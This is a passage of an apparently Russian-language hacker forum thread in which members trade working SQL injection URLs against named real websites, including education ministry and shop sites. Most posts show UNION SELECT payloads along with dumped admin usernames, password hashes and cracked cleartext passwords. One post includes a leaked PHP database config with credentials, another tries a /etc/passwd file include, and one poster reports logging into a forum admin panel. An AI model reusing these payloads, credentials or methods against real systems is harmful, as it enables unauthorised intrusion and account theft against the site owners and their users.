SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Вот еще чуток скулей:
    P.S. не забываем убирать пробелы! (;
     
  2. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.pmed.ru/conf/index.php?id=-2376111+union+select+1,2,3,4,5,6,7,8,9,10,11--
    странного вида инъекция -)
     
  3. Saint-Sky

    Saint-Sky Elder - Старейшина

    Joined:
    14 Jul 2007
    Messages:
    119
    Likes Received:
    77
    Reputations:
    27
    Мой рекорд по количеству столбцов. Ппц, не думал, что такое встречается...
    netan_netan@localhost
    5.0.51a-community-log
     
    4 people like this.
  4. KaJIaLL1HuKoB

    KaJIaLL1HuKoB New Member

    Joined:
    9 Jan 2007
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    наверно не в тему...

    низнаю полезно это или нет ну все же

    http://www .gorenje.ru/

    http://www .gorenje.ru/happynewyear/db.inc

    Code:
    
    <?php
    
    /*
    $sqlServer = 'localhost';
    $sqlLogin = 'root';
    $sqlPassword = 'a123dmin';
    $sqlDatabase = 'jar_gorenje';
    */
    
    
    $sqlServer = 'localhost';
    $sqlDatabase = 'site';
    $sqlLogin = 'site';
    $sqlPassword = 'Vie4u';
    
    $sqlHandle = mysql_connect ($sqlServer, $sqlLogin, $sqlPassword);
    
    mysql_select_db ($sqlDatabase, $sqlHandle);
    
    ?>
    
    
    
    зы его хостинг http://webhosting-say.hc. ru/


    Code:
    http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,name,4,5,6+from+srv14130_detki.shops--
    ничего толком и не нашол((
     
  5. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Еще 3 штучки
    P.S. и опять же не забываем про пробелы!
     
  6. none222

    none222 Guest

    Reputations:
    0
    гитаристам))
    http://www.akkords.ru/news.php?nid=-1+union+select+1,2,table_name,4,5,6,7+from+information_schema.tables/*
    http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,name,member_login_key),4,5,6,7+from+forum_akkords.ibf_members/*
    http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,login,pass),4,5,6,7+from+admin/*
    http://www.akkords.ru/news.php?nid=-1+union+select+1,2,concat_ws(0x3a,nick,pass),4,5,6,7+from+users/*

    сонник:
    http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,database(),3,4,5/*

    http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,table_name,3,4,5+from+information_schema.tables/*

    http://www.sonniki.net.ru/allsonnic/sonnic.php?ss=-1+union+select+1,column_name,3,4,5+from+information_schema.columns+where+table_name=CHAR(103,111,114)/*
     
    1 person likes this.
  7. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    to KaJIaLL1HuKoB
    Code:
    [COLOR=Plum]http://www.detki.ru/index.php?mode=gallery&id=-296+UNION+SELECT+1,2,concat_ws(0x3a,name,activity,addr,phone,email,site,number),4,5,6+from+shops--[/COLOR]
    Code:
    [COLOR=Plum]http://new.gazanalyzator.ru/index.php?id=-70/**/union/**/select/**/concat_ws(0x3a,user(),version(),database()),2,3,4--[/COLOR]
    gazanaly_gazanal@localhost:4.1.22-standard:gazanaly_data


    Code:
    [COLOR=Plum]http://www.rifpark.ru/enc/index.php?id=999+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10/*[/COLOR]
    4.1.22:[email protected]:wwwrifparkru_wwwrifparkru_wwwrifparkru

    Министерство образования РК(Республика Карелия) =D
    Code:
    [COLOR=Plum]http://minedu.karelia.ru/index.php?id=999+union+select+1,2,concat_Ws(0x3a,version(),user(),database()),4,5/*[/COLOR]
    4.0.11a-gamma:kfro@localhost:minedu

    Code:
    [COLOR=Plum]http://www.radiolemma.ru/inner.php?t=progs&id=-22177+union+select+concat_ws(0x3a,version(),user(),database()),2,3/*[/COLOR]
    4.1.22-community-max:[email protected]:lemma
     
  8. -=Static=-

    -=Static=- Banned

    Joined:
    12 Nov 2006
    Messages:
    201
    Likes Received:
    40
    Reputations:
    0
    нашел 2 таблицы:
    - news
    - users

    http://minedu.karelia.ru/devel/index.php?id=999+union+select+1,2,concat_ ws(0x3a,id,login,status),4, 5+from+users/*

    Code:
    1:root:rt 
    2:julia:wk 
    3:dmalinov:rt 
    4:Marina:rt 
    5:lataki:wk 
    6:kossuk:wk 
    7:morozov:wk 
    8:natalya:wk 
    9:gold:wk
    
    Не могу никак прознать как поле с паролем называется :confused:

    логиниться тут: http://minedu.karelia.ru/login.php

    ====================================
    Карельский Фонд Развития Образования:

    http://kfro.karelia.ru/index.php?id=13+union+select+1, id,login+from+users/*

    Таблица по строению такая же как и в министерстве. И лежит все удовольствие на одном серваке, тока в разных базах. Вопрос: Как называется поле с паролем? :confused:

    ====================================

    КПМО в Республике Карелия:

    есть возможность провести include. Тока у меня толком них не получается. Голова уже кипит...

    http://kpmo.karelia.ru/file/page.php?page_id=../../../../../etc/passwd%00

    Че не так то?

    Это же инклудится; http://kpmo.karelia.ru/file/page.php?page_id=/home/kpmo/www/file/news_62
     
    #6488 -=Static=-, 5 Sep 2008
    Last edited: 5 Sep 2008
    2 people like this.
  9. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Еще 7 штучек!

     
  10. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109

    Ты обрати внимание на вот эту ошибку
    приписывается расширение .html, ты конечно пытался его обрезать, но на сервере magic_quotes_gpc = On, т.е обрезать расширение не получиться.....

    Ну а если обратить внимание на первую ошибку:
    То видно, что сдесь удаленный инклуд, только опять же все портит расширение.....
     
    1 person likes this.
  11. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Итак
    все таблицы
    Code:
    -admins
    -articles
    -banners
    -campaign
    -categories
    -config
    -downloads
    -feedback
    -images
    -pages
    -prison_images
    -prisoners
    -prisons
    -prs_images
    -prs_letters
    -quotes
    -ticker
    -timeline
    
    Смотрим Admins
    Code:
    -admins
    --username
    --password
    --email
    --level
    --last_login
    На Username и password состовляем запрос
    Code:
    http://www.cageprisoners.com/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,password),4,5,6+from+admins+limit+1,1/*
    И получаем

    Frodo:F8wsn.HKddfWfe0eJ.jEV/
    SamG:Cn3At9msGsMmHeU.eMzUo0
    Gandalf:Uh00xKufkwGB.HWIvgWTv0

    чем разшифровывать эти хеши я х.з. поетому кто разшифрует плиз скиньте в личку пассы

    Кстати пошарив по сайту нашел админку для составления рассылок
    Code:
    http://cageprisoners.com/mailman/admin
     
    #6491 Мистерео, 5 Sep 2008
    Last edited: 5 Sep 2008
  12. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Итак розбираем )
    версия 5 значит смотрим таблицы
    Code:
    http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,table_name,4,5,6,7,8+from+information_schema.tables+limit+1,1/*
    среди них находим нужную _adminusr и смотрим на колонки и находим интерисующие нас pass,username и составляем запрос на чтение

    Code:
    http://www.graphicallies.com/news.php?ID=-1+union+select+1,2,concat_ws(0x3a,username,pass),4,5,6,7,8+from+_adminusr/*
    Получаем результат
    graphicadmin:10b8e9fc9fc6e8c5d42fb63f948934f6
    Пробиваем хеш по базам и получаем
    graphicadmin:topuser22

    Потом сканим сайт на директории и файлы и находим кучи админок
    http://www.graphicallies.com/admin/ - стоит basic аутидентификация логин и пасс не подходят
    Нашел ище одну http://www.graphicallies.com/admincontrols/index.php - но опьять же логин и пасс невалидны
    ище одна форма входа http://www.graphicallies.com:/hitech/userlogin.php - то самое логин и пасс невалидны
    http://www.graphicallies.com/newtestsite/admin/ -админка в которой ниче нельзя сделать...

    Где находится админка от сайта или где можна использовать логин\пароль х.з.
     
    #6492 Мистерео, 5 Sep 2008
    Last edited: 5 Sep 2008
    2 people like this.
  13. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    Итак приступим.
    Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом

    Code:
    http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/*
    Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал

    Andrey:2c44e4b135929e56f778fadc97077465
    Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03cfc
    Kremniov:c4ca4238a0b923820dcc509a6f75849b

    Начал проганять хеши через сервисы и только последний был взломан
    Kremniov:1
    попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде
    Code:
    http://www.democracy.ru/admin/
    но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было...

    А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...)

    P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))
     
  14. login999

    login999 Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    491
    Likes Received:
    280
    Reputations:
    92
    Code:
     http://www.mibf.ru/index.php?id=37+union+select+1,id,3,4,5,6,7,8,9,10+from+users/* 
    -скуля таблицу и одно из полей подобрал, дальше хз, + не вижу, куда выводятся результаты (в теле страницы вроде нет)
     
    #6494 login999, 6 Sep 2008
    Last edited: 6 Sep 2008
    1 person likes this.
  15. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    Code:
    http://www.fun.te.ua/?news=-1+union+select+11,22,version(),44,user(),database()/*
    
    user: funteua@localhost
    database: funteua
    version: 5.0.45


    запись админа из таблицы users:
    Code:
    http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,Login,Password+from+users+WHERE+ID=1/*
    

    Там еще форум есть phpbb3. Хэш админа:
    Code:
    http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,username,user_password+from+forumfun.phpbb3_users+WHERE+user_id=2/*
    
     
  16. Мистерео

    Мистерео Elder - Старейшина

    Joined:
    7 Aug 2006
    Messages:
    33
    Likes Received:
    32
    Reputations:
    1
    На форуме валяется два админа
    Первый Co1T второй ch@os
    хеш кольта пробивкой по мд5 ниче не дало а вот на ch@os'а мне выдало

    ch@os:641a668c3d04a7564b278413445808a5
    Пробив хеш получилось
    ch@os:18121985

    Логинимся на форуме выбираем админ панель и вуаля!Мы в админке
     
    3 people like this.
  17. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    Code:
    http://www.samara-sv.info/?static=-1'+union+select+111,user(),database(),version(),555,666/*
    
    user - samara@localhost
    database - samarasv2_main
    version - 5.0.22-log


    есть таблица users с двумя записями, вот только неизвестно от чего это

    Code:
    http://www.samara-sv.info/?static=-1'+union+select+111,login,passw,user_id,555,666+from+users/*
    

    9 turist ec6d9c8953ab272295ec0469bbed59ab (mountain)
    11 budym c645ef64e05f5c5c47e4b204a43b3323 (?)
     
  18. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.laterre.ca/?action=lienSousCat&idLienSousCat=116/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5,6,7,8,9,30,31,32+from+mysql.user+limit+1,1/*

    root:717714425d27f95d
     
  19. USAkid

    USAkid Elder - Старейшина

    Joined:
    17 Jun 2008
    Messages:
    191
    Likes Received:
    76
    Reputations:
    29
    http://www.spakedr.ru

    Code:
    http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())/*
    version() - 4.0.24-standard-log
    user() - [email protected]
    database() - 4.0.24-standard-logslavalne_joomla

    Code:
    http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users/*
    - запрос на логин/пасс/статус админа, но чето он отвергается.
     
  20. ..::TROYAN::..

    ..::TROYAN::.. Elder - Старейшина

    Joined:
    22 May 2008
    Messages:
    90
    Likes Received:
    116
    Reputations:
    14
    Code:
    http://www.maljutka.ru/shop/goods.php?id=9+union+select+1,concat(user(),0x3a,database(),0x3a,version()),null,4,5,6,7/*
    Code:
    http://www.maljutka.ru/shop/shop.php?id=9999+union+select+1,concat(user(),0x3a,database()),3,4,5,6/*
    user - [email protected]
    database - wwwmaljutkaru
    version - 4.1.22
     
    1 person likes this.
Thread Status:
Not open for further replies.